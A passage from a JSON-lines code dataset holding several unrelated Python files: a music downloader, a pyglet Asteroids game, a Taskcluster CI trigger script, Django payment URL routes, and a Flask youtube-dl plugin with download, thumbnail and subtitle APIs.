get_page_content(url=url)\r\n list_download_page = get_all_download_pages(content=content)\r\n\r\n # get quality\r\n print(DOWNLOAD_QUALITY)\r\n quality = input(\"Enter download quality: \")\r\n while quality not in DOWNLOAD_QUALITY:\r\n print(\"Invalid input. Please try again.\")\r\n quality = input(\"Enter download quality: \")\r\n\r\n custom_path = input('Enter folder to save (Enter to skip): ')\r\n if custom_path is not '':\r\n global DEFAULT_PATH\r\n DEFAULT_PATH += '\\\\' + custom_path\r\n\r\n for download_page in list_download_page:\r\n download_urls = get_download_url(page=download_page)\r\n if any(quality in u for u in download_urls):\r\n for u in download_urls:\r\n if (quality in u):\r\n download_music_file(u)\r\n else:\r\n #if user's quality choosen is not available for download, find the nearest download quality\r\n for q in DOWNLOAD_QUALITY[DOWNLOAD_QUALITY.index(quality) - 1::-1]:\r\n keep_find_quality = True\r\n for u in download_urls:\r\n if (q in u):\r\n download_music_file(u)\r\n keep_find_quality = False\r\n if keep_find_quality is False:\r\n break\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "CSN_downloader_public.py", "file_name": "CSN_downloader_public.py", "file_ext": "py", "file_size_in_byte": 3238, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.getcwd", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.request.request.unquote", "line_number": 20, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 20, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 26, "usage_type": "call"}, {"api_name": "io.open", "line_number": 27, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "600182904", "text": "import pyglet\n\nfrom game import resources, load\n\nfrom game.physicalobject import PhysicalObject\nfrom game.player import Player\n\ngame_window = pyglet.window.Window(800, 600)\n\nmain_batch = pyglet.graphics.Batch()\n\nfps_display = pyglet.clock.ClockDisplay()\n\nscore_label = pyglet.text.Label(text=\"Score: 0\", x=10, y=575, batch=main_batch)\nlevel_label = pyglet.text.Label(text=\"PyGlet Asteroids Game\",\n x=400, y=575,\n anchor_x='center',\n batch=main_batch)\n\nplayer_ship = Player(x=400, y=300, batch=main_batch)\nplayer_ship.rotation = 270\ngame_window.push_handlers(player_ship)\n\nasteroids = load.asteroids(3, player_ship.position, batch=main_batch)\n\ngame_objects = [player_ship] + asteroids\n\nplayer_lives = load.player_lives(3, batch=main_batch)\n\n@game_window.event\ndef on_draw():\n game_window.clear()\n fps_display.draw()\n main_batch.draw()\n\ndef update(dt):\n for obj in game_objects:\n obj.update(dt)\n\nif __name__ == '__main__':\n pyglet.clock.schedule_interval(update, 1/120.0)\n pyglet.app.run()\n", "sub_path": "version2/asteroids.py", "file_name": "asteroids.py", "file_ext": "py", "file_size_in_byte": 1106, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyglet.window.Window", "line_number": 8, "usage_type": "call"}, {"api_name": "pyglet.window", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pyglet.graphics.Batch", "line_number": 10, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pyglet.clock.ClockDisplay", "line_number": 12, "usage_type": "call"}, {"api_name": "pyglet.clock", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pyglet.text.Label", "line_number": 14, "usage_type": "call"}, {"api_name": "pyglet.text", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyglet.text.Label", "line_number": 15, "usage_type": "call"}, {"api_name": "pyglet.text", "line_number": 15, "usage_type": "attribute"}, {"api_name": "game.player.Player", "line_number": 20, "usage_type": "call"}, {"api_name": "game.load.asteroids", "line_number": 24, "usage_type": "call"}, {"api_name": "game.load", "line_number": 24, "usage_type": "name"}, {"api_name": "game.load.player_lives", "line_number": 28, "usage_type": "call"}, {"api_name": "game.load", "line_number": 28, "usage_type": "name"}, {"api_name": "pyglet.clock.schedule_interval", "line_number": 41, "usage_type": "call"}, {"api_name": "pyglet.clock", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pyglet.app.run", "line_number": 42, "usage_type": "call"}, {"api_name": "pyglet.app", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "366441084", "text": "import json\nimport os\nimport slugid\nimport taskcluster\nimport urllib.request\nfrom cib import createTask, updateWorkerPool\n\n\nworkerManager = taskcluster.WorkerManager(taskcluster.optionsFromEnvironment())\nqueue = taskcluster.Queue(taskcluster.optionsFromEnvironment())\ncommit = json.loads(urllib.request.urlopen(urllib.request.Request('https://api.github.com/repos/mozilla-platform-ops/cloud-image-builder/commits/{}'.format(os.getenv('TRAVIS_COMMIT')), None, { 'User-Agent' : 'Mozilla/5.0' })).read().decode())['commit']\n\nupdateWorkerPool(\n workerManager = workerManager,\n configPath = 'ci/config/worker-pool/relops/decision.yaml',\n workerPoolId = 'relops/decision')\nupdateWorkerPool(\n workerManager = workerManager,\n configPath = 'ci/config/worker-pool/relops/win2019.yaml',\n workerPoolId = 'relops/win2019')\n\ncreateTask(\n queue = queue,\n image = 'python',\n taskId = slugid.nice(),\n taskName = '00 :: decision task',\n taskDescription = 'determine which windows cloud images should be built, where they should be deployed and trigger appropriate build tasks for the same',\n provisioner = 'relops',\n workerType = 'decision',\n features = {\n 'taskclusterProxy': True\n },\n env = {\n 'GITHUB_HEAD_SHA': os.getenv('TRAVIS_COMMIT')\n },\n commands = [\n '/bin/bash',\n '--login',\n '-c',\n 'git clone https://github.com/mozilla-platform-ops/cloud-image-builder.git && pip install azure boto3 pyyaml slugid taskcluster urllib3 && cd cloud-image-builder && git reset --hard {} && python ci/{}.py'.format(os.getenv('TRAVIS_COMMIT'), 'pool-deploy' if commit['message'].startswith('pool-deploy') else 'create-image-build-tasks')\n ],\n scopes = [\n 'generic-worker:os-group:relops/win2019/Administrators',\n 'generic-worker:run-as-administrator:relops/*',\n 'queue:create-task:highest:relops/*',\n 'queue:create-task:very-high:relops/*',\n 'queue:create-task:high:relops/*',\n 'queue:create-task:medium:relops/*',\n 'queue:create-task:low:relops/*',\n 'queue:route:index.project.relops.cloud-image-builder.*',\n 'queue:scheduler-id:-',\n 'worker-manager:manage-worker-pool:gecko-1/win*',\n 'worker-manager:manage-worker-pool:gecko-3/win*',\n 'worker-manager:manage-worker-pool:gecko-t/win*',\n 'worker-manager:manage-worker-pool:mpd001-1/win*',\n 'worker-manager:manage-worker-pool:mpd001-3/win*',\n 'worker-manager:manage-worker-pool:relops/win*',\n 'worker-manager:provider:aws',\n 'worker-manager:provider:azure',\n 'secrets:get:project/relops/image-builder/dev'\n ]\n)\n", "sub_path": "ci/trigger-decision-task.py", "file_name": "trigger-decision-task.py", "file_ext": "py", "file_size_in_byte": 2525, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "taskcluster.WorkerManager", "line_number": 9, "usage_type": "call"}, {"api_name": "taskcluster.optionsFromEnvironment", "line_number": 9, "usage_type": "call"}, {"api_name": "taskcluster.Queue", "line_number": 10, "usage_type": "call"}, {"api_name": "taskcluster.optionsFromEnvironment", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 11, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 11, "usage_type": "name"}, {"api_name": "urllib.request.request.Request", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "cib.updateWorkerPool", "line_number": 13, "usage_type": "call"}, {"api_name": "cib.updateWorkerPool", "line_number": 17, "usage_type": "call"}, {"api_name": "cib.createTask", "line_number": 22, "usage_type": "call"}, {"api_name": "slugid.nice", "line_number": 25, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 34, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "228610634", "text": "from apps.pagos import views\nfrom django.conf.urls import patterns, url\nfrom django.views.generic import TemplateView\n\nurlpatterns = patterns('',\n\n url(r'^estado/de/cuenta/$',\n views.CompromisosListaView.as_view(),\n name='pst_compromisos_pago'),\n\n url(r'^compromisos/de/pago.json/$',\n views.compromiso_pago_json,\n name='pst_compromisos_pago_json'),\n\n url(r'^compromisos/de/pago/nuevo/$',\n views.compromiso_pago_nuevo,\n name='pst_compromisos_pago_nuevo'),\n\n url(r'^compromisos/de/pago/pdf/(?P\\d+)/$',\n views.planilla_pago_pdf,\n name='pst_compromisos_pago_pdf'),\n\n url(r'^compromisos/de/pago/1/$',\n TemplateView.as_view(template_name='pagos/pst/detalle_compromiso_pago.html'),\n name='pst_detalle_compromiso_pago'),\n\n url(r'^indebido/$',\n views.PagoIndebidoView.as_view(),\n name='pst_pago_indebido'),\n\n url(r'^indebido/reconocimientos/$',\n views.CesionesPagoIndebidoView.as_view(),\n name='pst_reconocimientos_pago_indebido'),\n\n )\n", "sub_path": "apps/pagos/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "apps.pagos.views.CompromisosListaView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "apps.pagos.views.CompromisosListaView", "line_number": 8, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "apps.pagos.views.compromiso_pago_json", "line_number": 12, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.pagos.views.compromiso_pago_nuevo", "line_number": 16, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "apps.pagos.views.planilla_pago_pdf", "line_number": 20, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 24, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "apps.pagos.views.PagoIndebidoView.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "apps.pagos.views.PagoIndebidoView", "line_number": 28, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "apps.pagos.views.CesionesPagoIndebidoView.as_view", "line_number": 32, "usage_type": "call"}, {"api_name": "apps.pagos.views.CesionesPagoIndebidoView", "line_number": 32, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "295477930", "text": "import os\nimport traceback\nimport subprocess\n\nfrom flask import Blueprint, request, render_template, redirect, jsonify, abort\nfrom flask_login import login_required\nfrom flask_cors import cross_origin\n\nfrom framework import check_api, socketio\nfrom framework.logger import get_logger\n\nfrom .logic import Logic\nfrom .logic_normal import LogicNormal\nfrom .model import ModelSetting\n\npackage_name = __name__.split('.')[0]\nlogger = get_logger(package_name)\nyoutube_dl_package = LogicNormal.get_youtube_dl_package(\n ModelSetting.get('youtube_dl_package') if ModelSetting.get('youtube_dl_package') else Logic.db_default[\n 'youtube_dl_package'], import_pkg=True)\n\n#########################################################\n# 플러그인 공용\n#########################################################\nblueprint = Blueprint(package_name, package_name, url_prefix='/%s' % package_name,\n template_folder=os.path.join(os.path.dirname(__file__), 'templates'),\n static_folder=os.path.join(os.path.dirname(__file__), 'static'))\n\nmenu = {\n 'main': [package_name, 'youtube-dl'],\n 'sub': [\n ['setting', '설정'], ['download', '다운로드'], ['thumbnail', '썸네일 다운로드'], ['sub', '자막 다운로드'], ['list', '목록'],\n ['log', '로그']\n ],\n 'category': 'vod'\n}\n\nplugin_info = {\n 'version': '3.0.1',\n 'name': 'youtube-dl',\n 'category_name': 'vod',\n 'developer': 'joyfuI',\n 'description': '유튜브, 네이버TV 등 동영상 사이트에서 동영상 다운로드',\n 'home': 'https://github.com/joyfuI/youtube-dl',\n 'more': ''\n}\n\n\ndef plugin_load():\n Logic.plugin_load()\n\n\ndef plugin_unload():\n Logic.plugin_unload()\n\n\n#########################################################\n# WEB Menu\n#########################################################\n@blueprint.route('/')\ndef home():\n return redirect('/%s/list' % package_name)\n\n\n@blueprint.route('/')\n@login_required\ndef first_menu(sub):\n try:\n arg = {\n 'package_name': package_name,\n 'template_name': '%s_%s' % (package_name, sub)\n }\n\n if sub == 'setting':\n arg.update(ModelSetting.to_dict())\n arg['package_list'] = LogicNormal.get_youtube_dl_package()\n arg['youtube_dl_version'] = LogicNormal.get_youtube_dl_version()\n arg['DEFAULT_FILENAME'] = LogicNormal.get_default_filename()\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'download':\n default_filename = ModelSetting.get('default_filename')\n arg['filename'] = default_filename if default_filename else LogicNormal.get_default_filename()\n arg['preset_list'] = LogicNormal.get_preset_list()\n arg['postprocessor_list'] = LogicNormal.get_postprocessor_list()\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'thumbnail':\n default_filename = ModelSetting.get('default_filename')\n arg['filename'] = default_filename if default_filename else LogicNormal.get_default_filename()\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'sub':\n default_filename = ModelSetting.get('default_filename')\n arg['filename'] = default_filename if default_filename else LogicNormal.get_default_filename()\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'list':\n return render_template('%s_%s.html' % (package_name, sub), arg=arg)\n\n elif sub == 'log':\n return render_template('log.html', package=package_name)\n except Exception as e:\n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n return render_template('sample.html', title='%s - %s' % (package_name, sub))\n\n\n#########################################################\n# For UI\n#########################################################\n@blueprint.route('/ajax/', methods=['POST'])\n@login_required\ndef ajax(sub):\n logger.debug('AJAX %s %s', package_name, sub)\n try:\n # 공통 요청\n if sub == 'setting_save':\n ret = ModelSetting.setting_save(request)\n if request.form['ffmpeg_path'] == 'ffmpeg':\n ModelSetting.set('ffmpeg_path', '')\n return jsonify(ret)\n\n # UI 요청\n elif sub == 'ffmpeg_version':\n path = request.form['path']\n ret = subprocess.check_output([path, '-version'])\n ret = ret.decode().replace('\\n', '
')\n return jsonify(ret)\n\n elif sub == 'download':\n postprocessor = request.form['postprocessor']\n video_convertor, extract_audio = LogicNormal.get_postprocessor()\n preferedformat = None\n preferredcodec = None\n preferredquality = None\n if postprocessor in video_convertor:\n preferedformat = postprocessor\n elif postprocessor in extract_audio:\n preferredcodec = postprocessor\n preferredquality = 192\n youtube_dl = LogicNormal.download(plugin=package_name,\n url=request.form['url'],\n filename=request.form['filename'],\n temp_path=ModelSetting.get('temp_path'),\n save_path=ModelSetting.get('save_path'),\n format=request.form['format'],\n preferedformat=preferedformat,\n preferredcodec=preferredcodec,\n preferredquality=preferredquality,\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'))\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify([])\n\n elif sub == 'thumbnail':\n youtube_dl = LogicNormal.thumbnail(plugin=package_name,\n url=request.form['url'],\n filename=request.form['filename'],\n temp_path=ModelSetting.get('temp_path'),\n save_path=ModelSetting.get('save_path'),\n all_thumbnails=request.form['all_thumbnails'],\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'))\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify([])\n\n elif sub == 'sub':\n youtube_dl = LogicNormal.sub(plugin=package_name,\n url=request.form['url'],\n filename=request.form['filename'],\n temp_path=ModelSetting.get('temp_path'),\n save_path=ModelSetting.get('save_path'),\n all_subs=request.form['all_subs'],\n sub_lang=request.form['sub_lang'],\n auto_sub=request.form['auto_sub'],\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'))\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify([])\n\n elif sub == 'list':\n ret = []\n for i in LogicNormal.youtube_dl_list:\n data = LogicNormal.get_data(i)\n if data is not None:\n ret.append(data)\n return jsonify(ret)\n\n elif sub == 'all_stop':\n for i in LogicNormal.youtube_dl_list:\n i.stop()\n return jsonify([])\n\n elif sub == 'stop':\n index = int(request.form['index'])\n LogicNormal.youtube_dl_list[index].stop()\n return jsonify([])\n except Exception as e:\n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n\n\n#########################################################\n# API\n#########################################################\n# API 명세는 https://github.com/joyfuI/youtube-dl#api\n@blueprint.route('/api/', methods=['GET', 'POST'])\n@cross_origin()\n@check_api\ndef api(sub):\n plugin = request.values.get('plugin')\n logger.debug('API %s %s: %s', package_name, sub, plugin)\n if not plugin: # 요청한 플러그인명이 빈문자열이거나 None면\n abort(403) # 403 에러(거부)\n try:\n # 동영상 정보를 반환하는 API\n if sub == 'info_dict':\n url = request.values.get('url')\n ret = {\n 'errorCode': 0,\n 'info_dict': None\n }\n if None in (url,):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n if not url.startswith('http'):\n return LogicNormal.abort(ret, 2) # 잘못된 동영상 주소\n info_dict = LogicNormal.get_info_dict(url, ModelSetting.get('proxy'))\n if info_dict is None:\n return LogicNormal.abort(ret, 10) # 실패\n ret['info_dict'] = info_dict\n return jsonify(ret)\n\n # 비디오 다운로드 준비를 요청하는 API\n elif sub == 'download':\n key = request.values.get('key')\n url = request.values.get('url')\n filename = request.values.get('filename', ModelSetting.get('default_filename'))\n save_path = request.values.get('save_path', ModelSetting.get('save_path'))\n format_code = request.values.get('format', None)\n preferedformat = request.values.get('preferedformat', None)\n preferredcodec = request.values.get('preferredcodec', None)\n preferredquality = request.values.get('preferredquality', 192)\n dateafter = request.values.get('dateafter', None)\n playlist = request.values.get('playlist', None)\n archive = request.values.get('archive', None)\n start = request.values.get('start', False)\n cookiefile = request.values.get('cookiefile', None)\n ret = {\n 'errorCode': 0,\n 'index': None\n }\n if None in (key, url):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n if not url.startswith('http'):\n return LogicNormal.abort(ret, 2) # 잘못된 동영상 주소\n if preferredcodec not in (None, 'best', 'mp3', 'aac', 'flac', 'm4a', 'opus', 'vorbis', 'wav'):\n return LogicNormal.abort(ret, 5) # 허용되지 않은 값이 있음\n if not filename:\n filename = LogicNormal.get_default_filename()\n youtube_dl = LogicNormal.download(plugin=plugin,\n url=url,\n filename=filename,\n temp_path=ModelSetting.get('temp_path'),\n save_path=save_path,\n format=format_code,\n preferedformat=preferedformat,\n preferredcodec=preferredcodec,\n preferredquality=preferredquality,\n dateafter=dateafter,\n playlist=playlist,\n archive=archive,\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'),\n key=key,\n cookiefile=cookiefile)\n if youtube_dl is None:\n return LogicNormal.abort(ret, 10) # 실패\n ret['index'] = youtube_dl.index\n if start:\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify(ret)\n\n # 썸네일 다운로드 준비를 요청하는 API\n elif sub == 'thumbnail':\n key = request.values.get('key')\n url = request.values.get('url')\n filename = request.values.get('filename', ModelSetting.get('default_filename'))\n save_path = request.values.get('save_path', ModelSetting.get('save_path'))\n all_thumbnails = request.values.get('all_thumbnails', False)\n dateafter = request.values.get('dateafter', None)\n playlist = request.values.get('playlist', None)\n archive = request.values.get('archive', None)\n start = request.values.get('start', False)\n cookiefile = request.values.get('cookiefile', None)\n ret = {\n 'errorCode': 0,\n 'index': None\n }\n if None in (key, url):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n if not url.startswith('http'):\n return LogicNormal.abort(ret, 2) # 잘못된 동영상 주소\n if not filename:\n filename = LogicNormal.get_default_filename()\n youtube_dl = LogicNormal.thumbnail(plugin=plugin,\n url=url,\n filename=filename,\n temp_path=ModelSetting.get('temp_path'),\n save_path=save_path,\n all_thumbnails=all_thumbnails,\n dateafter=dateafter,\n playlist=playlist,\n archive=archive,\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'),\n key=key,\n cookiefile=cookiefile)\n if youtube_dl is None:\n return LogicNormal.abort(ret, 10) # 실패\n ret['index'] = youtube_dl.index\n if start:\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify(ret)\n\n # 자막 다운로드 준비를 요청하는 API\n elif sub == 'sub':\n key = request.values.get('key')\n url = request.values.get('url')\n filename = request.values.get('filename', ModelSetting.get('default_filename'))\n save_path = request.values.get('save_path', ModelSetting.get('save_path'))\n all_subs = request.values.get('all_subs', False)\n sub_lang = request.values.get('sub_lang', 'ko')\n auto_sub = request.values.get('all_subs', False)\n dateafter = request.values.get('dateafter', None)\n playlist = request.values.get('playlist', None)\n archive = request.values.get('archive', None)\n start = request.values.get('start', False)\n cookiefile = request.values.get('cookiefile', None)\n ret = {\n 'errorCode': 0,\n 'index': None\n }\n if None in (key, url):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n if not url.startswith('http'):\n return LogicNormal.abort(ret, 2) # 잘못된 동영상 주소\n if not filename:\n filename = LogicNormal.get_default_filename()\n youtube_dl = LogicNormal.sub(plugin=plugin,\n url=url,\n filename=filename,\n temp_path=ModelSetting.get('temp_path'),\n save_path=save_path,\n all_subs=all_subs,\n sub_lang=sub_lang,\n auto_sub=auto_sub,\n dateafter=dateafter,\n playlist=playlist,\n archive=archive,\n proxy=ModelSetting.get('proxy'),\n ffmpeg_path=ModelSetting.get('ffmpeg_path'),\n key=key,\n cookiefile=cookiefile)\n if youtube_dl is None:\n return LogicNormal.abort(ret, 10) # 실패\n ret['index'] = youtube_dl.index\n if start:\n youtube_dl.start()\n socketio_emit('add', youtube_dl)\n return jsonify(ret)\n\n # 다운로드 시작을 요청하는 API\n elif sub == 'start':\n index = request.values.get('index')\n key = request.values.get('key')\n ret = {\n 'errorCode': 0,\n 'status': None\n }\n if None in (index, key):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n index = int(index)\n if not (0 <= index < len(LogicNormal.youtube_dl_list)):\n return LogicNormal.abort(ret, 3) # 인덱스 범위를 벗어남\n youtube_dl = LogicNormal.youtube_dl_list[index]\n if youtube_dl.key != key:\n return LogicNormal.abort(ret, 4) # 키가 일치하지 않음\n ret['status'] = youtube_dl.status.name\n if not youtube_dl.start():\n return LogicNormal.abort(ret, 10) # 실패\n return jsonify(ret)\n\n # 다운로드 중지를 요청하는 API\n elif sub == 'stop':\n index = request.values.get('index')\n key = request.values.get('key')\n ret = {\n 'errorCode': 0,\n 'status': None\n }\n if None in (index, key):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n index = int(index)\n if not (0 <= index < len(LogicNormal.youtube_dl_list)):\n return LogicNormal.abort(ret, 3) # 인덱스 범위를 벗어남\n youtube_dl = LogicNormal.youtube_dl_list[index]\n if youtube_dl.key != key:\n return LogicNormal.abort(ret, 4) # 키가 일치하지 않음\n ret['status'] = youtube_dl.status.name\n if not youtube_dl.stop():\n return LogicNormal.abort(ret, 10) # 실패\n return jsonify(ret)\n\n # 현재 상태를 반환하는 API\n elif sub == 'status':\n index = request.values.get('index')\n key = request.values.get('key')\n ret = {\n 'errorCode': 0,\n 'status': None,\n 'type': None,\n 'start_time': None,\n 'end_time': None,\n 'temp_path': None,\n 'save_path': None\n }\n if None in (index, key):\n return LogicNormal.abort(ret, 1) # 필수 요청 변수가 없음\n index = int(index)\n if not (0 <= index < len(LogicNormal.youtube_dl_list)):\n return LogicNormal.abort(ret, 3) # 인덱스 범위를 벗어남\n youtube_dl = LogicNormal.youtube_dl_list[index]\n if youtube_dl.key != key:\n return LogicNormal.abort(ret, 4) # 키가 일치하지 않음\n ret['status'] = youtube_dl.status.name\n ret['type'] = youtube_dl.type\n ret['start_time'] = youtube_dl.start_time.strftime('%Y-%m-%dT%H:%M:%S') if \\\n youtube_dl.start_time is not None else None\n ret['end_time'] = youtube_dl.end_time.strftime('%Y-%m-%dT%H:%M:%S') if \\\n youtube_dl.end_time is not None else None\n ret['temp_path'] = youtube_dl.temp_path\n ret['save_path'] = youtube_dl.save_path\n return jsonify(ret)\n except Exception as e:\n logger.error('Exception:%s', e)\n logger.error(traceback.format_exc())\n abort(500) # 500 에러(서버 오류)\n abort(404) # 404 에러(페이지 없음)\n\n\n#########################################################\n# socketio\n#########################################################\ndef socketio_emit(cmd, data):\n socketio.emit(cmd, LogicNormal.get_data(data), namespace='/%s' % package_name, broadcast=True)\n", "sub_path": "plugin.py", "file_name": "plugin.py", "file_ext": "py", "file_size_in_byte": 21279, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "framework.logger.get_logger", "line_number": 17, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.get_youtube_dl_package", "line_number": 18, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 18, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 19, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 19, "usage_type": "name"}, {"api_name": "logic.Logic.db_default", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logic.Logic", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.Blueprint", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 27, "usage_type": "call"}, {"api_name": "logic.Logic.plugin_load", "line_number": 50, "usage_type": "call"}, {"api_name": "logic.Logic", "line_number": 50, "usage_type": "name"}, {"api_name": "logic.Logic.plugin_unload", "line_number": 54, "usage_type": "call"}, {"api_name": "logic.Logic", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 62, "usage_type": "call"}, {"api_name": "model.ModelSetting.to_dict", "line_number": 75, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 75, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_youtube_dl_package", "line_number": 76, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 76, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_youtube_dl_version", "line_number": 77, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 77, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 78, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 79, "usage_type": "call"}, {"api_name": "model.ModelSetting.get", "line_number": 82, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 82, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 83, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 83, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_preset_list", "line_number": 84, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 84, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_postprocessor_list", "line_number": 85, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 86, "usage_type": "call"}, {"api_name": "model.ModelSetting.get", "line_number": 89, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 89, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 90, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "model.ModelSetting.get", "line_number": 94, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 94, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 95, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 102, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}, {"api_name": 